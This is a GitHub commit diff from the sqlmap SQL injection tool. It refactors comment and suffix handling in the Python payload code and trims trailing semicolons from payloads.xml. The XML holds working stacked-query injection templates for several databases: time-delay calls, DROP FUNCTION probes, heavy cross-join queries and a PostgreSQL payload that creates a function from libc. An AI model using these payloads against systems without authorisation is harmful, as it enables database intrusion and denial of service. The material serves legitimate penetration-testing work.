Skip to content

Commit 687f399

Browse files
stamparmstamparm
committed
Cleaning/refactoring of bunch of stacked/suffix/comment stuff (e.g.
1 parent 6bc5f44 commit 687f399

File tree

6 files changed

+47
-45
lines changed

6 files changed

+47
-45
lines changed

lib/controller/checks.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -500,7 +500,7 @@ def genCmpPayload():
500500
injection.os = Backend.setOs(dValue)
501501

502502
if vector is None and "vector" in test and test.vector is not None:
503-
vector = "%s%s" % (test.vector, comment or "")
503+
vector = test.vector
504504

505505
injection.data[stype] = AttribDict()
506506
injection.data[stype].title = title

lib/controller/controller.py

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -128,12 +128,15 @@ def __formatInjection(inj):
128128
for stype, sdata in inj.data.items():
129129
title = sdata.title
130130
vector = sdata.vector
131+
comment = sdata.comment
131132
if stype == PAYLOAD.TECHNIQUE.UNION:
132133
count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1
133134
title = re.sub(r"\d+ to \d+", str(count), title)
134135
vector = agent.forgeInbandQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
135136
if count == 1:
136137
title = title.replace("columns", "column")
138+
elif comment:
139+
vector = "%s%s" % (vector, comment)
137140
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
138141
data += " Title: %s\n" % title
139142
data += " Payload: %s\n" % agent.adjustLateValues(sdata.payload)

lib/core/agent.py

Lines changed: 8 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -189,25 +189,26 @@ def suffixQuery(self, expression, comment=None, suffix=None, where=None):
189189

190190
expression = self.cleanupPayload(expression)
191191

192-
# User supplied --suffix nullifies any eventual payload comments
193-
comment = None if conf.suffix is not None and suffix == conf.suffix else comment
192+
# Take default values if None
193+
suffix = kb.injection.suffix if kb.injection and suffix is None else suffix
194+
195+
if kb.technique and kb.technique in kb.injection.data:
196+
where = kb.injection.data[kb.technique].where if where is None else where
197+
comment = kb.injection.data[kb.technique].comment if comment is None else comment
194198

195199
if Backend.getIdentifiedDbms() == DBMS.ACCESS and comment == GENERIC_SQL_COMMENT:
196200
comment = "%00"
197201

198202
if comment is not None:
199203
expression += comment
200204

201-
if where is None and kb.technique and kb.technique in kb.injection.data:
202-
where = kb.injection.data[kb.technique].where
203-
204205
# If we are replacing (<where>) the parameter original value with
205206
# our payload do not append the suffix
206207
if where == PAYLOAD.WHERE.REPLACE:
207208
pass
208209

209-
elif any([kb.injection.suffix, suffix]) and not (comment and not conf.suffix):
210-
expression += " %s" % (kb.injection.suffix or suffix)
210+
elif suffix and not comment:
211+
expression += " %s" % suffix
211212

212213
return re.sub(r"(?s);\W*;", ";", expression)
213214

lib/request/inject.py

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -466,9 +466,8 @@ def goStacked(expression, silent=False):
466466
if conf.direct:
467467
return direct(expression)
468468

469-
comment = queries[Backend.getIdentifiedDbms()].comment.query
470469
query = agent.prefixQuery(";%s" % expression)
471-
query = agent.suffixQuery(query, comment)
470+
query = agent.suffixQuery(query)
472471
payload = agent.payload(newValue=query)
473472
Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True)
474473

lib/techniques/dns/use.py

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -71,9 +71,8 @@ def dnsUse(payload, expression):
7171
expressionUnescaped = unescaper.unescape(expressionRequest)
7272

7373
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
74-
comment = queries[Backend.getIdentifiedDbms()].comment.query
7574
query = agent.prefixQuery("; %s" % expressionUnescaped)
76-
query = agent.suffixQuery(query, comment)
75+
query = agent.suffixQuery(query)
7776
forgedPayload = agent.payload(newValue=query)
7877
else:
7978
forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))

xml/payloads.xml

Lines changed: 33 additions & 33 deletions
Original file line numberDiff line numberDiff line change
@@ -1072,13 +1072,13 @@ Formats:
10721072
<risk>0</risk>
10731073
<clause>0</clause>
10741074
<where>1</where>
1075-
<vector>; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</vector>
1075+
<vector>; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR])</vector>
10761076
<request>
1077-
<payload>; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</payload>
1077+
<payload>; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR])</payload>
10781078
<comment>#</comment>
10791079
</request>
10801080
<response>
1081-
<comparison>; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</comparison>
1081+
<comparison>; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR])</comparison>
10821082
</response>
10831083
<details>
10841084
<dbms>MySQL</dbms>
@@ -1092,13 +1092,13 @@ Formats:
10921092
<risk>0</risk>
10931093
<clause>0</clause>
10941094
<where>1</where>
1095-
<vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</vector>
1095+
<vector>; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
10961096
<request>
1097-
<payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</payload>
1097+
<payload>; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</payload>
10981098
<comment>--</comment>
10991099
</request>
11001100
<response>
1101-
<comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR];</comparison>
1101+
<comparison>; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</comparison>
11021102
</response>
11031103
<details>
11041104
<dbms>Microsoft SQL Server</dbms>
@@ -1114,13 +1114,13 @@ Formats:
11141114
<risk>0</risk>
11151115
<clause>0</clause>
11161116
<where>2</where>
1117-
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</vector>
1117+
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
11181118
<request>
1119-
<payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</payload>
1119+
<payload>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</payload>
11201120
<comment>--</comment>
11211121
</request>
11221122
<response>
1123-
<comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END);</comparison>
1123+
<comparison>; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</comparison>
11241124
</response>
11251125
<details>
11261126
<dbms>PostgreSQL</dbms>
@@ -1969,9 +1969,9 @@ Formats:
19691969
<risk>0</risk>
19701970
<clause>0</clause>
19711971
<where>1</where>
1972-
<vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]);</vector>
1972+
<vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
19731973
<request>
1974-
<payload>; SELECT SLEEP([SLEEPTIME]);</payload>
1974+
<payload>; SELECT SLEEP([SLEEPTIME])</payload>
19751975
<comment>-- </comment>
19761976
</request>
19771977
<response>
@@ -1990,9 +1990,9 @@ Formats:
19901990
<risk>2</risk>
19911991
<clause>0</clause>
19921992
<where>1</where>
1993-
<vector>; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]);</vector>
1993+
<vector>; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
19941994
<request>
1995-
<payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'));</payload>
1995+
<payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
19961996
<comment>-- </comment>
19971997
</request>
19981998
<response>
@@ -2010,9 +2010,9 @@ Formats:
20102010
<risk>0</risk>
20112011
<clause>0</clause>
20122012
<where>1</where>
2013-
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);</vector>
2013+
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
20142014
<request>
2015-
<payload>; SELECT PG_SLEEP([SLEEPTIME]);</payload>
2015+
<payload>; SELECT PG_SLEEP([SLEEPTIME])</payload>
20162016
<comment>--</comment>
20172017
</request>
20182018
<response>
@@ -2031,9 +2031,9 @@ Formats:
20312031
<risk>2</risk>
20322032
<clause>0</clause>
20332033
<where>1</where>
2034-
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END);</vector>
2034+
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
20352035
<request>
2036-
<payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000);</payload>
2036+
<payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
20372037
<comment>--</comment>
20382038
</request>
20392039
<response>
@@ -2051,9 +2051,9 @@ Formats:
20512051
<risk>0</risk>
20522052
<clause>0</clause>
20532053
<where>1</where>
2054-
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);</vector>
2054+
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
20552055
<request>
2056-
<payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]);</payload>
2056+
<payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
20572057
<comment>--</comment>
20582058
</request>
20592059
<response>
@@ -2073,9 +2073,9 @@ Formats:
20732073
<risk>0</risk>
20742074
<clause>0</clause>
20752075
<where>1</where>
2076-
<vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]';</vector>
2076+
<vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
20772077
<request>
2078-
<payload>; WAITFOR DELAY '0:0:[SLEEPTIME]';</payload>
2078+
<payload>; WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
20792079
<comment>--</comment>
20802080
</request>
20812081
<response>
@@ -2095,9 +2095,9 @@ Formats:
20952095
<risk>0</risk>
20962096
<clause>0</clause>
20972097
<where>1</where>
2098-
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL;</vector>
2098+
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
20992099
<request>
2100-
<payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL;</payload>
2100+
<payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
21012101
<comment>--</comment>
21022102
</request>
21032103
<response>
@@ -2115,9 +2115,9 @@ Formats:
21152115
<risk>2</risk>
21162116
<clause>0</clause>
21172117
<where>1</where>
2118-
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL;</vector>
2118+
<vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
21192119
<request>
2120-
<payload>; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5;</payload>
2120+
<payload>; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
21212121
<comment>--</comment>
21222122
</request>
21232123
<response>
@@ -2135,9 +2135,9 @@ Formats:
21352135
<risk>0</risk>
21362136
<clause>0</clause>
21372137
<where>1</where>
2138-
<vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
2138+
<vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
21392139
<request>
2140-
<payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END;</payload>
2140+
<payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
21412141
<comment>--</comment>
21422142
</request>
21432143
<response>
@@ -2155,9 +2155,9 @@ Formats:
21552155
<risk>0</risk>
21562156
<clause>0</clause>
21572157
<where>1</where>
2158-
<vector>; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END;</vector>
2158+
<vector>; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
21592159
<request>
2160-
<payload>; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END;</payload>
2160+
<payload>; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
21612161
<comment>--</comment>
21622162
</request>
21632163
<response>
@@ -2175,9 +2175,9 @@ Formats:
21752175
<risk>2</risk>
21762176
<clause>0</clause>
21772177
<where>1</where>
2178-
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END);</vector>
2178+
<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END)</vector>
21792179
<request>
2180-
<payload>; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))));</payload>
2180+
<payload>; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))</payload>
21812181
<comment>--</comment>
21822182
</request>
21832183
<response>
@@ -2196,9 +2196,9 @@ Formats:
21962196
<risk>2</risk>
21972197
<clause>0</clause>
21982198
<where>1</where>
2199-
<vector>; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM]) FROM RDB$DATABASE;</vector>
2199+
<vector>; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM]) FROM RDB$DATABASE</vector>
22002200
<request>
2201-
<payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3;</payload>
2201+
<payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3</payload>
22022202
<comment>--</comment>
22032203
</request>
22042204
<response>

0 commit comments

Comments
 (0)